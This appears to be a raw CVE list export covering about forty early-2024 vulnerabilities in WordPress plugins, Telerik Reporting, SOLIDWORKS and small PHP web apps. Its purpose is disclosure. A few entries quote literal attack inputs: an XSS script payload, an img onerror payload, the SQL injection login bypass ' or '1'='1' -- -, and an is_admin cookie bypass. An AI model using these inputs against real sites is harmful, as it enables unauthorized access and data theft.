CVE    2024    1857    Candidate    The Ultimate Gift Cards for WooCommerce – Create, Redeem & Manage Digital Gift Certificates with Personalized Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the wps_wgm_preview_email_template(). This makes it possible for unauthenticated attackers to read password protected and draft posts that may contain sensitive data.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve    Assigned (20240223)
CVE    2024    1856    Candidate    In Progress® Telerik® Reporting versions prior to 2024 Q1 (18.0.24.130), a code execution attack is possible by a remote threat actor through an insecure deserialization vulnerability.    MISC:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856   |   URL:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856   |   MISC:https://www.telerik.com/products/reporting.aspx   |   URL:https://www.telerik.com/products/reporting.aspx    Assigned (20240223)
CVE    2024    1854    Candidate    The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve    Assigned (20240223)
CVE    2024    1853    Candidate    Zemana AntiLogger v2.74.204.664 is vulnerable to an Arbitrary Process Termination vulnerability by triggering the 0x80002048 IOCTL code of the zam64.sys and zamguard64.sys drivers.    MISC:https://fluidattacks.com/advisories/ellington/   |   URL:https://fluidattacks.com/advisories/ellington/   |   MISC:https://zemana.com/us/antilogger.html   |   URL:https://zemana.com/us/antilogger.html    Assigned (20240223)
CVE    2024    1851    Candidate    The affiliate-toolkit – WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_create_list() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions such as creating product lists.    MISC:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve    Assigned (20240223)
CVE    2024    1848    Candidate    Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in SOLIDWORKS Desktop on Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file.    MISC:https://www.3ds.com/vulnerability/advisories   |   URL:https://www.3ds.com/vulnerability/advisories    Assigned (20240223)
CVE    2024    1847    Candidate    Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file.    MISC:https://www.3ds.com/vulnerability/advisories   |   URL:https://www.3ds.com/vulnerability/advisories    Assigned (20240223)
CVE    2024    1844    Candidate    The RevivePress – Keep your Old Content Evergreen plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the import_data and copy_data functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access or higher, to overwrite plugin settings and view them.    MISC:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L148   |   URL:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L148   |   MISC:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L161   |   URL:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L161   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve    Assigned (20240223)
CVE    2024    1843    Candidate    The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3. This makes it possible for authenticated attackers, with subscriber access or higher, to add arbitrary links to posts.    MISC:https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_ajax.php#L79   |   URL:https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_ajax.php#L79   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve    Assigned (20240223)
CVE    2024    1834    Candidate    A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as problematic. This affects an unknown part of the file ?page=attendance&class_id=1. The manipulation of the argument class_date with the input 2024-02-23%22%3E%3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254625 was assigned to this vulnerability.    MISC:VDB-254625 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254625   |   MISC:VDB-254625 | SourceCodester Simple Student Attendance System ?page=attendance&class_id=1 cross site scripting   |   URL:https://vuldb.com/?id.254625   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Simple-Student-Attendance-System.md#2pageattendancexss   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Simple-Student-Attendance-System.md#2pageattendancexss    Assigned (20240223)
CVE    2024    1833    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /Account/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254624.    MISC:VDB-254624 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254624   |   MISC:VDB-254624 | SourceCodester Employee Management System login.php sql injection   |   URL:https://vuldb.com/?id.254624   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/employee-management-system.md#2accountloginphp   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/employee-management-system.md#2accountloginphp    Assigned (20240223)
CVE    2024    1832    Candidate    A vulnerability has been found in SourceCodester Complete File Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ of the component Admin Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254623.    MISC:VDB-254623 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254623   |   MISC:VDB-254623 | SourceCodester Complete File Management System Admin Login Form sql injection   |   URL:https://vuldb.com/?id.254623   |   MISC:https://toradah.notion.site/SQL-Injection-via-Admin-Login-Form-7372893848cb4bb996ae2c9effb0266a?pvs=25   |   URL:https://toradah.notion.site/SQL-Injection-via-Admin-Login-Form-7372893848cb4bb996ae2c9effb0266a?pvs=25    Assigned (20240223)
CVE    2024    1831    Candidate    A vulnerability, which was classified as critical, was found in SourceCodester Complete File Management System 1.0. Affected is an unknown function of the file users/index.php of the component Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254622 is the identifier assigned to this vulnerability.    MISC:VDB-254622 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254622   |   MISC:VDB-254622 | SourceCodester Complete File Management System Login Form index.php sql injection   |   URL:https://vuldb.com/?id.254622   |   MISC:https://toradah.notion.site/Login-Bypass-via-SQL-injection-b1e45264f6104bc696836ade6e60fb98?pvs=4   |   URL:https://toradah.notion.site/Login-Bypass-via-SQL-injection-b1e45264f6104bc696836ade6e60fb98?pvs=4    Assigned (20240223)
CVE    2024    1830    Candidate    A vulnerability was found in code-projects Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file Source/librarian/user/student/lost-password.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254618 is the identifier assigned to this vulnerability.    MISC:VDB-254618 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254618   |   MISC:VDB-254618 | code-projects Library System lost-password.php sql injection   |   URL:https://vuldb.com/?id.254618   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.5Library%20System%20In%20PHP%20-%20SQL%20Injection-student_lostpass.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.5Library%20System%20In%20PHP%20-%20SQL%20Injection-student_lostpass.md    Assigned (20240223)
CVE    2024    1829    Candidate    A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/regno/phone/username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254617 was assigned to this vulnerability.    MISC:VDB-254617 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254617   |   MISC:VDB-254617 | code-projects Library System registration.php sql injection   |   URL:https://vuldb.com/?id.254617   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.4Library%20System%20In%20PHP%20-%20SQL%20Injection-student_reg.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.4Library%20System%20In%20PHP%20-%20SQL%20Injection-student_reg.md    Assigned (20240223)
CVE    2024    1828    Candidate    A vulnerability was found in code-projects Library System 1.0. It has been classified as critical. Affected is an unknown function of the file Source/librarian/user/teacher/registration.php. The manipulation of the argument email/idno/phone/username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254616.    MISC:VDB-254616 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254616   |   MISC:VDB-254616 | code-projects Library System registration.php sql injection   |   URL:https://vuldb.com/?id.254616   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.3Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_reg.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.3Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_reg.md    Assigned (20240223)
CVE    2024    1827    Candidate    A vulnerability was found in code-projects Library System 1.0 and classified as critical. This issue affects some unknown processing of the file Source/librarian/user/teacher/login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254615.    MISC:VDB-254615 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254615   |   MISC:VDB-254615 | code-projects Library System login.php sql injection   |   URL:https://vuldb.com/?id.254615   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.2Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_login.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.2Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_login.md    Assigned (20240223)
CVE    2024    1826    Candidate    A vulnerability has been found in code-projects Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file Source/librarian/user/student/login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254614 is the identifier assigned to this vulnerability.    MISC:VDB-254614 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254614   |   MISC:VDB-254614 | code-projects Library System login.php sql injection   |   URL:https://vuldb.com/?id.254614   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3Library%20System%20In%20PHP%20-%20SQL%20Injection-student_login.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3Library%20System%20In%20PHP%20-%20SQL%20Injection-student_login.md    Assigned (20240223)
CVE    2024    1825    Candidate    A vulnerability, which was classified as problematic, was found in CodeAstro House Rental Management System 1.0. This affects an unknown part of the component User Registration Page. The manipulation of the argument address with the input <img src="1" onerror="console.log(1)"> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254613 was assigned to this vulnerability.    MISC:VDB-254613 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254613   |   MISC:VDB-254613 | CodeAstro House Rental Management System User Registration Page cross site scripting   |   URL:https://vuldb.com/?id.254613   |   MISC:https://docs.qq.com/doc/DYndSY3V4UXh4dHFC   |   URL:https://docs.qq.com/doc/DYndSY3V4UXh4dHFC    Assigned (20240223)
CVE    2024    1824    Candidate    A vulnerability, which was classified as critical, has been found in CodeAstro House Rental Management System 1.0. Affected by this issue is some unknown functionality of the file signing.php. The manipulation of the argument uname/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254612.    MISC:VDB-254612 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254612   |   MISC:VDB-254612 | CodeAstro House Rental Management System signing.php sql injection   |   URL:https://vuldb.com/?id.254612   |   MISC:https://docs.qq.com/doc/DYk9QcHVFRENObWtj   |   URL:https://docs.qq.com/doc/DYk9QcHVFRENObWtj    Assigned (20240223)
CVE    2024    1823    Candidate    A vulnerability classified as critical was found in CodeAstro Simple Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file users.php of the component Backend. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254611.    MISC:VDB-254611 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254611   |   MISC:VDB-254611 | CodeAstro Simple Voting System Backend users.php access control   |   URL:https://vuldb.com/?id.254611   |   MISC:https://docs.qq.com/doc/DYll0ZEFKcUdGYlNr   |   URL:https://docs.qq.com/doc/DYll0ZEFKcUdGYlNr    Assigned (20240223)
CVE    2024    1822    Candidate    A vulnerability classified as problematic has been found in PHPGurukul Tourism Management System 1.0. Affected is an unknown function of the file user-bookings.php. The manipulation of the argument Full Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254610 is the identifier assigned to this vulnerability.    MISC:VDB-254610 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254610   |   MISC:VDB-254610 | PHPGurukul Tourism Management System user-bookings.php cross site scripting   |   URL:https://vuldb.com/?id.254610   |   MISC:https://drive.google.com/file/d/1ulzFlRqsex39dDUOFU2LbmphrQblSAwn/view?usp=drive_link   |   URL:https://drive.google.com/file/d/1ulzFlRqsex39dDUOFU2LbmphrQblSAwn/view?usp=drive_link    Assigned (20240223)
CVE    2024    1821    Candidate    A vulnerability was found in code-projects Crime Reporting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file police_add.php. The manipulation of the argument police_name/police_id/police_spec/password leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254609 was assigned to this vulnerability.    MISC:VDB-254609 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254609   |   MISC:VDB-254609 | code-projects Crime Reporting System police_add.php sql injection   |   URL:https://vuldb.com/?id.254609   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/2Crime%20Reporting%20System%20-%20SQL%20Injection-police_add.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/2Crime%20Reporting%20System%20-%20SQL%20Injection-police_add.md    Assigned (20240223)
CVE    2024    1820    Candidate    A vulnerability was found in code-projects Crime Reporting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file inchargelogin.php. The manipulation of the argument email/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254608.    MISC:VDB-254608 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254608   |   MISC:VDB-254608 | code-projects Crime Reporting System inchargelogin.php sql injection   |   URL:https://vuldb.com/?id.254608   |   MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/1Crime%20Reporting%20System%20-%20SQL%20Injection.md   |   URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/1Crime%20Reporting%20System%20-%20SQL%20Injection.md    Assigned (20240223)
CVE    2024    1819    Candidate    A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the component Add Members Tab. The manipulation of the argument Member Photo leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254607.    MISC:VDB-254607 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254607   |   MISC:VDB-254607 | CodeAstro Membership Management System Add Members Tab unrestricted upload   |   URL:https://vuldb.com/?id.254607   |   MISC:https://drive.google.com/file/d/12sNvBJ7wYjZ-2NBLdyG4e-L8sOO-zrbK/view?usp=sharing   |   URL:https://drive.google.com/file/d/12sNvBJ7wYjZ-2NBLdyG4e-L8sOO-zrbK/view?usp=sharing    Assigned (20240223)
CVE    2024    1818    Candidate    A vulnerability was found in CodeAstro Membership Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /uploads/ of the component Logo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254606 is the identifier assigned to this vulnerability.    MISC:VDB-254606 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254606   |   MISC:VDB-254606 | CodeAstro Membership Management System Logo unrestricted upload   |   URL:https://vuldb.com/?id.254606   |   MISC:https://drive.google.com/file/d/1EqHqZXfxhNkrDXNfx7wglpxaa5ZlPbx4/view?usp=drive_link   |   URL:https://drive.google.com/file/d/1EqHqZXfxhNkrDXNfx7wglpxaa5ZlPbx4/view?usp=drive_link    Assigned (20240223)
CVE    2024    1817    Candidate    A vulnerability has been found in Demososo DM Enterprise Website Building System up to 2022.8 and classified as critical. Affected by this vulnerability is the function dmlogin of the file indexDM_load.php of the component Cookie Handler. The manipulation of the argument is_admin with the input y leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254605 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254605 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.254605   |   MISC:VDB-254605 | Demososo DM Enterprise Website Building System Cookie indexDM_load.php dmlogin improper authentication   |   URL:https://vuldb.com/?id.254605   |   MISC:https://note.zhaoj.in/share/8gO8yxJ8aN51   |   URL:https://note.zhaoj.in/share/8gO8yxJ8aN51    Assigned (20240223)
CVE    2024    1811    Candidate    A potential vulnerability has been identified in OpenText ArcSight Platform. The vulnerability could be remotely exploited.    MISC:https://portal.microfocus.com/s/article/KM000027383   |   URL:https://portal.microfocus.com/s/article/KM000027383    Assigned (20240222)
CVE    2024    1810    Candidate    The Archivist – Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve    Assigned (20240222)
CVE    2024    1808    Candidate    The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_qrcode' shortcode in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3041647/shortcodes-ultimate   |   URL:https://plugins.trac.wordpress.org/changeset/3041647/shortcodes-ultimate   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve    Assigned (20240222)
CVE    2024    1806    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.15.0/src/ShortcodeParser/EditProfileTag.php#L76   |   URL:https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.15.0/src/ShortcodeParser/EditProfileTag.php#L76   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve    Assigned (20240222)
CVE    2024    1802    Candidate    The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wistia embed block in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the user supplied url. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve    Assigned (20240222)
CVE    2024    1801    Candidate    In Progress® Telerik® Reporting versions prior to 2024 Q1 (18.0.24.130), a code execution attack is possible by a local threat actor through an insecure deserialization vulnerability.    MISC:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856   |   URL:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856   |   MISC:https://www.telerik.com/products/reporting.aspx   |   URL:https://www.telerik.com/products/reporting.aspx    Assigned (20240222)
CVE    2024    1800    Candidate    In Progress® Telerik® Report Server versions prior to 2024 Q1 (10.0.24.130), a remote code execution attack is possible through an insecure deserialization vulnerability.    MISC:https://docs.telerik.com/report-server/knowledge-base/deserialization-vulnerability-cve-2024-1800   |   URL:https://docs.telerik.com/report-server/knowledge-base/deserialization-vulnerability-cve-2024-1800   |   MISC:https://www.telerik.com/report-server   |   URL:https://www.telerik.com/report-server    Assigned (20240222)
CVE    2024    1799    Candidate    The GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to SQL Injection via the 'achievement_types' attribute of the gamipress_earnings shortcode in all versions up to, and including, 6.8.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve    Assigned (20240222)
CVE    2024    1796    Candidate    The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'swoof_slug'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve    Assigned (20240222)
CVE    2024    1795    Candidate    The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve   |   